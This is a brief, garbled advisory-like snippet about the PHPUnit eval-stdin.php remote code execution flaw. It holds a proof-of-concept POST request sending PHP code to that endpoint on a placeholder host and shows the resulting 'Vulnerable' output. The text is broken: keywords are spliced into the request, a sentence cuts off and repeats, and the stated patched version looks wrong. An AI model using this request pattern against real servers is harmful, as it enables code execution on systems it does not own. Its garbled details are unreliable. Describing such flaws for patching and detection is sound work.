The PHPUnit vendor has released a patch for the vulnerability, which is included in PHPUnit version 9.5.0. The vendor has also provided guidance on mitigating the vulnerability.
POST /vendor/phpunit/phpunit/src/util/php/eval-stdin.php HTTP/1.1 Host: vulnerable-system.com Content-Type: application/x-www-form-urlencoded vendor phpunit phpunit src util php eval-stdin.php cve
<?php echo 'Vulnerable'; ?> The vulnerable PHPUnit instance will execute the malicious input, resulting in the output: The PHPUnit vendor has released a patch for
Vulnerable